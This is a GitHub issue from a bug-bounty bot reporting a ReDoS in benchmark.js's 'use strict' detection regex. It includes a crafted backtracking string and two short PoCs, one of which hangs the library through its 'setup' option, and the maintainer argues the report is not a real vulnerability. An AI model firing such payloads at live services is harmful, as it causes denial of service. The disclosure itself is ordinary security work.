search

bestiejs / benchmark.js

A benchmarking library. As used on jsPerf.com.
https://benchmarkjs.com/
Other
5.48k stars 333 forks source link

huntr - Regular expression Denial of Service (ReDoS) #229

Open huntr-helper opened 4 years ago

huntr-helper commented 4 years ago

This issue has been generated on-behalf of snoopysecurity (https://huntr.dev/app/users/snoopysecurity)

Vulnerability Description

It is possible to insert an evil regex as part of benchmark options such as setup, fn, fnArg ,teardown which can be used to conduct denial of service attacks benchmarkjs. This is possible because the regex use to check use strict string allows multiple repetitions of '***//' which allows Catastrophic Backtracking.

Steps To Reproduce:

Simple PoC

This is a PoC of the extracted regex use to simply demonstrate that the ReDoS is possible. Benchmark is used here simply to measure time

var normal_payload = `
"use strict";
myFunction();
`
var redos = '/****//**//****//**//****//**//****//**//****//**//****//**//****//**//****//**//*\*/ /*//**//**//*_*//**/*//';
//normal test
console.time('benchmark');
/^(?:\/\*+[\w\W]*?\*\/|\/\/.*?[\n\r\u2028\u2029]|\s)*(["'])use strict\1;?$/.test(normal_payload);
console.timeEnd('benchmark');

//exploit payload
console.time('benchmark');
/^(?:\/\*+[\w\W]*?\*\/|\/\/.*?[\n\r\u2028\u2029]|\s)*(["'])use strict\1;?$/.test(redos);
console.timeEnd('benchmark');

Package PoC

This PoC demonstrates the malicious regex being inserted as part of potential user input.This hangs

var redos = '/****//**//****//**//****//**//****//**//****//**//****//**//****//**//****//**//*\*/ /*//**//**//*_*//**/*//';
var Benchmark = require('benchmark');
var bench = Benchmark({
        redos : true,
        'setup': redos,
        'fn': 'throw a;',
        'teardown': 'a = 2;'

      }).run()

console.log(bench);

Bug Bounty

We have opened up a bounty for this issue on our bug bounty platform. Want to solve this vulnerability and get rewarded :moneybag:? Go to https://huntr.dev/

mathiasbynens commented 4 years ago

If you know of a way to change the regular expression to not have catastrophic backtracking, we'd certainly accept a patch. But note that this is not a security vulnerability in Benchmark.js. For example, it's also possible to benchmark the snippet while (true);, which has the same "DoS" effect. It's up to the application that uses Benchmark.js to ensure it's not run with untrusted content or, in this case, with untrusted options.

JamieSlome commented 4 years ago

@mathiasbynens - re: the backtracking, we will keep the bug bounty up on https://huntr.dev and review some of the suggestions provided by the security community! 🍰